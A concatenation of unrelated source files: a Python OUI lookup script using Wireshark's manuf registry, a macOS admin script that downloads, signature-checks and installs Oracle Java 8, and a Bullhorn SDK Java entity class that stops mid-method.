    # def dispatch(self, event: Any, payload = {}) -> None:
    #     pass

    # @abstractmethod
    # def get_listeners(self, event: str) -> List:
    #     pass
|
<gh_stars>1-10
import sys
from typing import Type
from dataclasses import dataclass
from requests import get, Response
from search_strategies import SearchStrategy
from search_strategies import LinearSearchStrategy
@dataclass
class OUISearch:
    """Pairs an OUI lookup string with the fetched manuf-registry response,
    and delegates the actual lookup to a pluggable search strategy."""
    oui_item: str
    oui_response: Type[Response]

    def __repr__(self):
        # The OUI string itself is the most useful representation.
        return self.oui_item

    def search(self, searching_strategy: Type[SearchStrategy]):
        # Hand both the item and the registry response to the strategy.
        return searching_strategy.search(self.oui_item, self.oui_response)
if __name__ == '__main__':
    # Download Wireshark's manufacturer (OUI) registry file.
    response: Response = get('https://gitlab.com/wireshark/wireshark/-/raw/master/manuf')
    try:
        # argv[1] is the MAC/OUI prefix to look up, e.g. "00:00:00".
        oui_search = OUISearch(sys.argv[1], response)
        print(f'\n\n{oui_search.search(LinearSearchStrategy)}\n\n')
    except IndexError:
        # No argument supplied on the command line.
        print('Please specify the MAC address for the search like so: python oui.py 00:00:00')
|
#!/bin/bash

# This script downloads and installs the latest Oracle Java 8 for compatible Macs
# NOTE(review): "$3" below follows the Casper/Jamf policy-script convention
# (third argument = target volume mount point) — confirm before running standalone.

# Determine OS version
# NOTE(review): takes the SECOND dot-field of productVersion (e.g. "10.9.5" -> 9);
# this breaks on macOS 11+ where the major version is no longer "10" — confirm
# the supported OS range before reuse.
osvers=$(sw_vers -productVersion | awk -F. '{print $2}')

# Specify the "OracleUpdateXML" variable by adding the "SUFeedURL" value included in the
# /Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Info.plist file.
#
# Note: The "OracleUpdateXML" variable is currently specified in the script as that for
# Java 8 Update 20, but the XML address embedded with Java 8 Update 20 is not special in
# this regard. I have verified that using the address for Java 8 Update 5 will also work
# to pull the address of the latest Oracle Java 8 installer disk image. To get the "SUFeedURL"
# value embedded with your currently installed version of Java 8 on Mac OS X, please run
# the following command in Terminal:
#
# defaults read "/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Info" SUFeedURL
#
# As of Java 8 Update 20, that produces the following return:
#
# https://javadl-esd-secure.oracle.com/update/mac/au-1.8.0_20.xml
#
OracleUpdateXML="https://javadl-esd-secure.oracle.com/update/mac/au-1.8.0_20.xml"

# Use the XML address defined in the OracleUpdateXML variable to query Oracle via curl
# for the complete address of the latest Oracle Java 8 installer disk image.
fileURL=`/usr/bin/curl --silent $OracleUpdateXML | awk -F \" /enclosure/'{print $(NF-1)}'`

# Specify name of downloaded disk image
java_eight_dmg="$3/tmp/java_eight.dmg"

if [[ ${osvers} -lt 7 ]]; then
  echo "Oracle Java 8 is not available for Mac OS X 10.6.8 or earlier."
fi

if [[ ${osvers} -ge 7 ]]; then

  # Download the latest Oracle Java 8 software disk image
  # The curl -L option is needed because there is a redirect
  # that the requested page has moved to a different location.
  /usr/bin/curl --retry 3 -Lo "$java_eight_dmg" "$fileURL"

  # Specify a /tmp/java_eight.XXXX mountpoint for the disk image
  TMPMOUNT=`/usr/bin/mktemp -d "$3"/tmp/java_eight.XXXX`

  # Mount the latest Oracle Java 8 disk image to /tmp/java_eight.XXXX mountpoint
  hdiutil attach "$java_eight_dmg" -mountpoint "$TMPMOUNT" -nobrowse -noverify -noautoopen

  # Install Oracle Java 8 from the installer package. This installer may
  # be stored inside an install application on the disk image, or there
  # may be an installer package available at the root of the mounted disk
  # image.
  if [[ -e "$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))" ]]; then
    pkg_path="$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))"
  elif [[ -e "$(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*\.app \))" ]]; then
    oracle_app=`(/usr/bin/find $TMPMOUNT -maxdepth 1 \( -iname \*\.app \))`
    if [[ -e "$(/usr/bin/find "$oracle_app"/Contents/Resources -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))" ]]; then
      pkg_path="$(/usr/bin/find "$oracle_app"/Contents/Resources -maxdepth 1 \( -iname \*Java*\.pkg -o -iname \*Java*\.mpkg \))"
    fi
  fi

  # Before installation, the installer's developer certificate is checked to
  # see if it has been signed by Oracle's developer certificate. Once the
  # certificate check has been passed, the package is then installed.
  if [[ "${pkg_path}" != "" ]]; then
    signature_check=`/usr/sbin/pkgutil --check-signature "$pkg_path" | awk /'Developer ID Installer/{ print $5 }'`
    if [[ ${signature_check} = "Oracle" ]]; then
      # Install Oracle Java 8 from the installer package stored inside the disk image
      /usr/sbin/installer -dumplog -verbose -pkg "${pkg_path}" -target "$3"
    fi
  fi

  # Clean-up

  # Unmount the Oracle Java 8 disk image from /tmp/java_eight.XXXX
  /usr/bin/hdiutil detach -force "$TMPMOUNT"

  # Remove the /tmp/java_eight.XXXX mountpoint
  /bin/rm -rf "$TMPMOUNT"

  # Remove the downloaded disk image
  /bin/rm -rf "$java_eight_dmg"
fi

exit 0
|
<gh_stars>0
package com.bullhornsdk.data.model.entity.core.standard;
import com.bullhornsdk.data.api.helper.RestOneToManySerializer;
import com.bullhornsdk.data.model.entity.core.customobject.*;
import com.bullhornsdk.data.model.entity.core.type.AssociationEntity;
import com.bullhornsdk.data.model.entity.core.type.CreateEntity;
import com.bullhornsdk.data.model.entity.core.type.DateLastModifiedEntity;
import com.bullhornsdk.data.model.entity.core.type.EditHistoryEntity;
import com.bullhornsdk.data.model.entity.core.type.FileEntity;
import com.bullhornsdk.data.model.entity.core.type.QueryEntity;
import com.bullhornsdk.data.model.entity.core.type.SearchEntity;
import com.bullhornsdk.data.model.entity.core.type.UpdateEntity;
import com.bullhornsdk.data.model.entity.customfields.CustomFieldsB;
import com.bullhornsdk.data.model.entity.embedded.Address;
import com.bullhornsdk.data.model.entity.embedded.OneToMany;
import com.bullhornsdk.data.model.entity.embedded.OneToManyLinkedId;
import com.bullhornsdk.data.util.ReadOnly;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonPropertyOrder;
import com.fasterxml.jackson.annotation.JsonRootName;
import com.fasterxml.jackson.databind.annotation.JsonSerialize;
import org.joda.time.DateTime;
import javax.validation.constraints.Size;
import java.math.BigDecimal;
@JsonInclude(JsonInclude.Include.NON_NULL)
@JsonRootName(value = "data")
@JsonPropertyOrder({ "id", "address", "annualRevenue", "billingAddress", "billingContact", "billingFrequency", "billingPhone",
"branch", "businessSectorList", "certifications", "requirements", "certificationGroups", "childClientCorporations", "clientContacts",
"companyDescription", "companyURL", "competitors", "culture", "customDate1", "customDate2", "customDate3", "customFloat1", "customFloat2",
"customFloat3", "customInt1", "customInt2", "customInt3", "customText1", "customText10", "customText11", "customText12", "customText13",
"customText14", "customText15", "customText16", "customText17", "customText18", "customText19", "customText2", "customText20",
"customText3", "customText4", "customText5", "customText6", "customText7", "customText8", "customText9", "customTextBlock1",
"customTextBlock2", "customTextBlock3", "customTextBlock4", "customTextBlock5", "dateAdded", "dateFounded", "dateLastModified", "department",
"externalID", "fax", "feeArrangement", "funding", "industryList", "invoiceFormat", "leads", "linkedinProfileName", "name", "notes", "numEmployees", "numOffices",
"ownership", "parentClientCorporation", "phone", "revenue", "status", "taxRate", "tickerSymbol", "trackTitle", "workWeekStart",
"customObject1s", "customObject2s", "customObject3s", "customObject4s", "customObject5s", "customObject6s", "customObject7s",
"customObject8s", "customObject9s", "customObject10s" })
public class ClientCorporation extends CustomFieldsB implements QueryEntity, UpdateEntity, CreateEntity, FileEntity, AssociationEntity,
SearchEntity, DateLastModifiedEntity, EditHistoryEntity {
    // --- Identity ---
    private Integer id;

    // --- Addresses, billing and finance ---
    private Address address;

    private BigDecimal annualRevenue;

    private Address billingAddress;

    @JsonIgnore
    @Size(max = 100)
    private String billingContact;

    @JsonIgnore
    @Size(max = 20)
    private String billingFrequency;

    @JsonIgnore
    @Size(max = 20)
    private String billingPhone;

    private Branch branch;

    @JsonIgnore
    private String businessSectorList;

    // --- Related entities ---
    private OneToMany<ClientCorporation> childClientCorporations;

    private OneToMany<ClientContact> clientContacts;

    // --- Company profile ---
    @JsonIgnore
    private String companyDescription;

    @JsonIgnore
    @Size(max = 100)
    private String companyURL;

    @JsonIgnore
    private String competitors;

    @JsonIgnore
    private String culture;

    // --- Dates ---
    private DateTime dateAdded;

    private DateTime dateFounded;

    private DateTime dateLastModified;

    private CorporationDepartment department;

    @JsonIgnore
    private String externalID;

    @JsonIgnore
    private String fax;

    private BigDecimal feeArrangement;

    @JsonIgnore
    private String funding;

    @JsonIgnore
    private String industryList;

    @JsonIgnore
    private String invoiceFormat;

    private OneToMany<Lead> leads;

    @JsonIgnore
    @Size(max = 200)
    private String linkedinProfileName;

    @JsonIgnore
    @Size(max = 100)
    private String name;

    @JsonIgnore
    private String notes;

    private Integer numEmployees;

    private Integer numOffices;

    @JsonIgnore
    @Size(max = 30)
    private String ownership;

    private OneToManyLinkedId owners;

    private ClientCorporation parentClientCorporation;

    @JsonIgnore
    @Size(max = 20)
    private String phone;

    @JsonIgnore
    private String revenue;

    @JsonIgnore
    @Size(max = 30)
    private String status;

    private BigDecimal taxRate;

    @JsonIgnore
    @Size(max = 20)
    private String tickerSymbol;

    @JsonIgnore
    @Size(max = 200)
    private String trackTitle;

    private Integer workWeekStart;

    // --- Certifications ---
    private OneToMany<Certification> requirements;

    private OneToMany<CertificationGroup> certificationGroups;

    private OneToMany<ClientCorporationCertification> certifications; // legacy certifications

    // --- Custom object instances 1-35 ---
    private OneToMany<ClientCorporationCustomObjectInstance1> customObject1s;

    private OneToMany<ClientCorporationCustomObjectInstance2> customObject2s;

    private OneToMany<ClientCorporationCustomObjectInstance3> customObject3s;

    private OneToMany<ClientCorporationCustomObjectInstance4> customObject4s;

    private OneToMany<ClientCorporationCustomObjectInstance5> customObject5s;

    private OneToMany<ClientCorporationCustomObjectInstance6> customObject6s;

    private OneToMany<ClientCorporationCustomObjectInstance7> customObject7s;

    private OneToMany<ClientCorporationCustomObjectInstance8> customObject8s;

    private OneToMany<ClientCorporationCustomObjectInstance9> customObject9s;

    private OneToMany<ClientCorporationCustomObjectInstance10> customObject10s;

    private OneToMany<ClientCorporationCustomObjectInstance11> customObject11s;

    private OneToMany<ClientCorporationCustomObjectInstance12> customObject12s;

    private OneToMany<ClientCorporationCustomObjectInstance13> customObject13s;

    private OneToMany<ClientCorporationCustomObjectInstance14> customObject14s;

    private OneToMany<ClientCorporationCustomObjectInstance15> customObject15s;

    private OneToMany<ClientCorporationCustomObjectInstance16> customObject16s;

    private OneToMany<ClientCorporationCustomObjectInstance17> customObject17s;

    private OneToMany<ClientCorporationCustomObjectInstance18> customObject18s;

    private OneToMany<ClientCorporationCustomObjectInstance19> customObject19s;

    private OneToMany<ClientCorporationCustomObjectInstance20> customObject20s;

    private OneToMany<ClientCorporationCustomObjectInstance21> customObject21s;

    private OneToMany<ClientCorporationCustomObjectInstance22> customObject22s;

    private OneToMany<ClientCorporationCustomObjectInstance23> customObject23s;

    private OneToMany<ClientCorporationCustomObjectInstance24> customObject24s;

    private OneToMany<ClientCorporationCustomObjectInstance25> customObject25s;

    private OneToMany<ClientCorporationCustomObjectInstance26> customObject26s;

    private OneToMany<ClientCorporationCustomObjectInstance27> customObject27s;

    private OneToMany<ClientCorporationCustomObjectInstance28> customObject28s;

    private OneToMany<ClientCorporationCustomObjectInstance29> customObject29s;

    private OneToMany<ClientCorporationCustomObjectInstance30> customObject30s;

    private OneToMany<ClientCorporationCustomObjectInstance31> customObject31s;

    private OneToMany<ClientCorporationCustomObjectInstance32> customObject32s;

    private OneToMany<ClientCorporationCustomObjectInstance33> customObject33s;

    private OneToMany<ClientCorporationCustomObjectInstance34> customObject34s;

    private OneToMany<ClientCorporationCustomObjectInstance35> customObject35s;
    /** Creates an empty ClientCorporation. */
    public ClientCorporation() {
        super();
    }

    /**
     * Creates a ClientCorporation referencing an existing record.
     * @param id the id of the corporation
     */
    public ClientCorporation(Integer id) {
        super();
        this.id = id;
    }
@JsonProperty("id")
public Integer getId() {
return id;
}
@ReadOnly
@JsonProperty("id")
public void setId(Integer id) {
this.id = id;
}
@JsonProperty("address")
public Address getAddress() {
return address;
}
@JsonProperty("address")
public void setAddress(Address address) {
this.address = address;
}
@JsonProperty("annualRevenue")
public BigDecimal getAnnualRevenue() {
return annualRevenue;
}
@JsonProperty("annualRevenue")
public void setAnnualRevenue(BigDecimal annualRevenue) {
this.annualRevenue = annualRevenue;
}
@JsonProperty("billingAddress")
public Address getBillingAddress() {
return billingAddress;
}
@JsonProperty("billingAddress")
public void setBillingAddress(Address billingAddress) {
this.billingAddress = billingAddress;
}
@JsonProperty("billingContact")
public String getBillingContact() {
return billingContact;
}
@JsonIgnore
public void setBillingContact(String billingContact) {
this.billingContact = billingContact;
}
@JsonProperty("billingFrequency")
public String getBillingFrequency() {
return billingFrequency;
}
@JsonIgnore
public void setBillingFrequency(String billingFrequency) {
this.billingFrequency = billingFrequency;
}
@JsonProperty("billingPhone")
public String getBillingPhone() {
return billingPhone;
}
@JsonIgnore
public void setBillingPhone(String billingPhone) {
this.billingPhone = billingPhone;
}
@JsonProperty("branch")
public Branch getBranch() {
return branch;
}
@JsonProperty("branch")
public void setBranch(Branch branch) {
this.branch = branch;
}
@JsonProperty("businessSectorList")
public String getBusinessSectorList() {
return businessSectorList;
}
@JsonIgnore
public void setBusinessSectorList(String businessSectorList) {
this.businessSectorList = businessSectorList;
}
@JsonProperty("childClientCorporations")
public OneToMany<ClientCorporation> getChildClientCorporations() {
return childClientCorporations;
}
@ReadOnly
@JsonProperty("childClientCorporations")
public void setChildClientCorporations(OneToMany<ClientCorporation> childClientCorporations) {
this.childClientCorporations = childClientCorporations;
}
@JsonProperty("clientContacts")
public OneToMany<ClientContact> getClientContacts() {
return clientContacts;
}
@ReadOnly
@JsonProperty("clientContacts")
public void setClientContacts(OneToMany<ClientContact> clientContacts) {
this.clientContacts = clientContacts;
}
@JsonProperty("companyDescription")
public String getCompanyDescription() {
return companyDescription;
}
@JsonIgnore
public void setCompanyDescription(String companyDescription) {
this.companyDescription = companyDescription;
}
@JsonProperty("companyURL")
public String getCompanyURL() {
return companyURL;
}
@JsonIgnore
public void setCompanyURL(String companyURL) {
this.companyURL = companyURL;
}
@JsonProperty("competitors")
public String getCompetitors() {
return competitors;
}
@JsonIgnore
public void setCompetitors(String competitors) {
this.competitors = competitors;
}
@JsonProperty("culture")
public String getCulture() {
return culture;
}
@JsonIgnore
public void setCulture(String culture) {
this.culture = culture;
}
@JsonProperty("dateAdded")
public DateTime getDateAdded() {
return dateAdded;
}
@ReadOnly
@JsonProperty("dateAdded")
public void setDateAdded(DateTime dateAdded) {
this.dateAdded = dateAdded;
}
@JsonProperty("dateFounded")
public DateTime getDateFounded() {
return dateFounded;
}
@JsonProperty("dateFounded")
public void setDateFounded(DateTime dateFounded) {
this.dateFounded = dateFounded;
}
@JsonProperty("dateLastModified")
public DateTime getDateLastModified() {
return dateLastModified;
}
@ReadOnly
@JsonProperty("dateLastModified")
public void setDateLastModified(DateTime dateLastModified) {
this.dateLastModified = dateLastModified;
}
@JsonProperty("department")
public CorporationDepartment getDepartment() {
return department;
}
@JsonProperty("department")
public void setDepartment(CorporationDepartment department) {
this.department = department;
}
@JsonProperty("externalID")
public String getExternalID() {
return externalID;
}
@JsonIgnore
public void setExternalID(String externalID) {
this.externalID = externalID;
}
@JsonProperty("fax")
public String getFax() {
return fax;
}
@JsonProperty("fax")
public void setFax(String fax) {
this.fax = fax;
}
@JsonProperty("feeArrangement")
public BigDecimal getFeeArrangement() {
return feeArrangement;
}
@JsonProperty("feeArrangement")
public void setFeeArrangement(BigDecimal feeArrangement) {
this.feeArrangement = feeArrangement;
}
@JsonProperty("funding")
public String getFunding() {
return funding;
}
@JsonIgnore
public void setFunding(String funding) {
this.funding = funding;
}
@JsonProperty("industryList")
public String getIndustryList() {
return industryList;
}
@JsonIgnore
public void setIndustryList(String industryList) {
this.industryList = industryList;
}
@JsonProperty("invoiceFormat")
public String getInvoiceFormat() {
return invoiceFormat;
}
@JsonProperty("invoiceFormat")
public void setInvoiceFormat(String invoiceFormat) {
this.invoiceFormat = invoiceFormat;
}
@JsonProperty("leads")
public OneToMany<Lead> getLeads() {
return leads;
}
@JsonProperty("leads")
public void setLeads(OneToMany<Lead> leads) {
this.leads = leads;
}
@JsonProperty("linkedinProfileName")
public String getLinkedinProfileName() {
return linkedinProfileName;
}
@JsonIgnore
public void setLinkedinProfileName(String linkedinProfileName) {
this.linkedinProfileName = linkedinProfileName;
}
@JsonProperty("name")
public String getName() {
return name;
}
@JsonIgnore
public void setName(String name) {
this.name = name;
}
@JsonProperty("notes")
public String getNotes() {
return notes;
}
@JsonIgnore
public void setNotes(String notes) {
this.notes = notes;
}
@JsonProperty("numEmployees")
public Integer getNumEmployees() {
return numEmployees;
}
@JsonProperty("numEmployees")
public void setNumEmployees(Integer numEmployees) {
this.numEmployees = numEmployees;
}
@JsonProperty("numOffices")
public Integer getNumOffices() {
return numOffices;
}
@JsonProperty("numOffices")
public void setNumOffices(Integer numOffices) {
this.numOffices = numOffices;
}
@JsonProperty("ownership")
public String getOwnership() {
return ownership;
}
@JsonIgnore
public void setOwnership(String ownership) {
this.ownership = ownership;
}
@JsonIgnore
public OneToManyLinkedId getOwners() {
return owners;
}
@ReadOnly
@JsonProperty("owners")
public void setOwners(OneToManyLinkedId owners) {
this.owners = owners;
}
@JsonProperty("parentClientCorporation")
public ClientCorporation getParentClientCorporation() {
return parentClientCorporation;
}
@JsonProperty("parentClientCorporation")
public void setParentClientCorporation(ClientCorporation parentClientCorporation) {
this.parentClientCorporation = parentClientCorporation;
}
@JsonProperty("phone")
public String getPhone() {
return phone;
}
@JsonIgnore
public void setPhone(String phone) {
this.phone = phone;
}
@JsonProperty("revenue")
public String getRevenue() {
return revenue;
}
@JsonIgnore
public void setRevenue(String revenue) {
this.revenue = revenue;
}
@JsonProperty("status")
public String getStatus() {
return status;
}
@JsonIgnore
public void setStatus(String status) {
this.status = status;
}
@JsonProperty("taxRate")
public BigDecimal getTaxRate() {
return taxRate;
}
@JsonProperty("taxRate")
public void setTaxRate(BigDecimal taxRate) {
this.taxRate = taxRate;
}
@JsonProperty("tickerSymbol")
public String getTickerSymbol() {
return tickerSymbol;
}
@JsonIgnore
public void setTickerSymbol(String tickerSymbol) {
this.tickerSymbol = tickerSymbol;
}
@JsonProperty("trackTitle")
public String getTrackTitle() {
return trackTitle;
}
@JsonIgnore
public void setTrackTitle(String trackTitle) {
this.trackTitle = trackTitle;
}
@JsonProperty("workWeekStart")
public Integer getWorkWeekStart() {
return workWeekStart;
}
@JsonProperty("workWeekStart")
public void setWorkWeekStart(Integer workWeekStart) {
this.workWeekStart = workWeekStart;
}
@JsonProperty("requirements")
public OneToMany<Certification> getRequirements() {
return requirements;
}
@ReadOnly
@JsonProperty("requirements")
public void setRequirements(OneToMany<Certification> requirements) {
this.requirements = requirements;
}
@JsonProperty("certificationGroups")
public OneToMany<CertificationGroup> getCertificationGroups() {
return certificationGroups;
}
@ReadOnly
@JsonProperty("certificationGroups")
public void setCertificationGroups(OneToMany<CertificationGroup> certificationGroups) {
this.certificationGroups = certificationGroups;
}
@JsonProperty("certifications")
public OneToMany<ClientCorporationCertification> getCertifications() {
return certifications;
}
@ReadOnly
@JsonProperty("certifications")
public void setCertifications(OneToMany<ClientCorporationCertification> certifications) {
this.certifications = certifications;
}
@JsonProperty("customObject1s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance1> getCustomObject1s() {
return customObject1s;
}
@JsonProperty("customObject1s")
public void setCustomObject1s(OneToMany<ClientCorporationCustomObjectInstance1> customObject1s) {
this.customObject1s = customObject1s;
}
@JsonProperty("customObject2s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance2> getCustomObject2s() {
return customObject2s;
}
@JsonProperty("customObject2s")
public void setCustomObject2s(OneToMany<ClientCorporationCustomObjectInstance2> customObject2s) {
this.customObject2s = customObject2s;
}
@JsonProperty("customObject3s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance3> getCustomObject3s() {
return customObject3s;
}
@JsonProperty("customObject3s")
public void setCustomObject3s(OneToMany<ClientCorporationCustomObjectInstance3> customObject3s) {
this.customObject3s = customObject3s;
}
@JsonProperty("customObject4s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance4> getCustomObject4s() {
return customObject4s;
}
@JsonProperty("customObject4s")
public void setCustomObject4s(OneToMany<ClientCorporationCustomObjectInstance4> customObject4s) {
this.customObject4s = customObject4s;
}
@JsonProperty("customObject5s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance5> getCustomObject5s() {
return customObject5s;
}
@JsonProperty("customObject5s")
public void setCustomObject5s(OneToMany<ClientCorporationCustomObjectInstance5> customObject5s) {
this.customObject5s = customObject5s;
}
@JsonProperty("customObject6s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance6> getCustomObject6s() {
return customObject6s;
}
@JsonProperty("customObject6s")
public void setCustomObject6s(OneToMany<ClientCorporationCustomObjectInstance6> customObject6s) {
this.customObject6s = customObject6s;
}
@JsonProperty("customObject7s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance7> getCustomObject7s() {
return customObject7s;
}
@JsonProperty("customObject7s")
public void setCustomObject7s(OneToMany<ClientCorporationCustomObjectInstance7> customObject7s) {
this.customObject7s = customObject7s;
}
@JsonProperty("customObject8s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance8> getCustomObject8s() {
return customObject8s;
}
@JsonProperty("customObject8s")
public void setCustomObject8s(OneToMany<ClientCorporationCustomObjectInstance8> customObject8s) {
this.customObject8s = customObject8s;
}
@JsonProperty("customObject9s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance9> getCustomObject9s() {
return customObject9s;
}
@JsonProperty("customObject9s")
public void setCustomObject9s(OneToMany<ClientCorporationCustomObjectInstance9> customObject9s) {
this.customObject9s = customObject9s;
}
@JsonProperty("customObject10s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance10> getCustomObject10s() {
return customObject10s;
}
@JsonProperty("customObject10s")
public void setCustomObject10s(OneToMany<ClientCorporationCustomObjectInstance10> customObject10s) {
this.customObject10s = customObject10s;
}
@JsonProperty("customObject11s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance11> getCustomObject11s() {
return customObject11s;
}
@JsonProperty("customObject11s")
public void setCustomObject11s(OneToMany<ClientCorporationCustomObjectInstance11> customObject11s) {
this.customObject11s = customObject11s;
}
@JsonProperty("customObject12s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance12> getCustomObject12s() {
return customObject12s;
}
@JsonProperty("customObject12s")
public void setCustomObject12s(OneToMany<ClientCorporationCustomObjectInstance12> customObject12s) {
this.customObject12s = customObject12s;
}
@JsonProperty("customObject13s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance13> getCustomObject13s() {
return customObject13s;
}
@JsonProperty("customObject13s")
public void setCustomObject13s(OneToMany<ClientCorporationCustomObjectInstance13> customObject13s) {
this.customObject13s = customObject13s;
}
@JsonProperty("customObject14s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance14> getCustomObject14s() {
return customObject14s;
}
@JsonProperty("customObject14s")
public void setCustomObject14s(OneToMany<ClientCorporationCustomObjectInstance14> customObject14s) {
this.customObject14s = customObject14s;
}
@JsonProperty("customObject15s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance15> getCustomObject15s() {
return customObject15s;
}
@JsonProperty("customObject15s")
public void setCustomObject15s(OneToMany<ClientCorporationCustomObjectInstance15> customObject15s) {
this.customObject15s = customObject15s;
}
@JsonProperty("customObject16s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance16> getCustomObject16s() {
return customObject16s;
}
@JsonProperty("customObject16s")
public void setCustomObject16s(OneToMany<ClientCorporationCustomObjectInstance16> customObject16s) {
this.customObject16s = customObject16s;
}
@JsonProperty("customObject17s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance17> getCustomObject17s() {
return customObject17s;
}
@JsonProperty("customObject17s")
public void setCustomObject17s(OneToMany<ClientCorporationCustomObjectInstance17> customObject17s) {
this.customObject17s = customObject17s;
}
@JsonProperty("customObject18s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance18> getCustomObject18s() {
return customObject18s;
}
@JsonProperty("customObject18s")
public void setCustomObject18s(OneToMany<ClientCorporationCustomObjectInstance18> customObject18s) {
this.customObject18s = customObject18s;
}
@JsonProperty("customObject19s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance19> getCustomObject19s() {
    return customObject19s;
}

@JsonProperty("customObject19s")
public void setCustomObject19s(OneToMany<ClientCorporationCustomObjectInstance19> customObject19s) {
    this.customObject19s = customObject19s;
}
@JsonProperty("customObject20s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance20> getCustomObject20s() {
return customObject20s;
}
@JsonProperty("customObject20s")
public void setCustomObject20s(OneToMany<ClientCorporationCustomObjectInstance20> customObject20s) {
this.customObject20s = customObject20s;
}
@JsonProperty("customObject21s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance21> getCustomObject21s() {
return customObject21s;
}
@JsonProperty("customObject21s")
public void setCustomObject21s(OneToMany<ClientCorporationCustomObjectInstance21> customObject21s) {
this.customObject21s = customObject21s;
}
@JsonProperty("customObject22s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance22> getCustomObject22s() {
return customObject22s;
}
@JsonProperty("customObject22s")
public void setCustomObject22s(OneToMany<ClientCorporationCustomObjectInstance22> customObject22s) {
this.customObject22s = customObject22s;
}
@JsonProperty("customObject23s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance23> getCustomObject23s() {
return customObject23s;
}
@JsonProperty("customObject23s")
public void setCustomObject23s(OneToMany<ClientCorporationCustomObjectInstance23> customObject23s) {
this.customObject23s = customObject23s;
}
@JsonProperty("customObject24s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance24> getCustomObject24s() {
return customObject24s;
}
@JsonProperty("customObject24s")
public void setCustomObject24s(OneToMany<ClientCorporationCustomObjectInstance24> customObject24s) {
this.customObject24s = customObject24s;
}
@JsonProperty("customObject25s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance25> getCustomObject25s() {
return customObject25s;
}
@JsonProperty("customObject25s")
public void setCustomObject25s(OneToMany<ClientCorporationCustomObjectInstance25> customObject25s) {
this.customObject25s = customObject25s;
}
@JsonProperty("customObject26s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance26> getCustomObject26s() {
return customObject26s;
}
@JsonProperty("customObject26s")
public void setCustomObject26s(OneToMany<ClientCorporationCustomObjectInstance26> customObject26s) {
this.customObject26s = customObject26s;
}
@JsonProperty("customObject27s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance27> getCustomObject27s() {
return customObject27s;
}
@JsonProperty("customObject27s")
public void setCustomObject27s(OneToMany<ClientCorporationCustomObjectInstance27> customObject27s) {
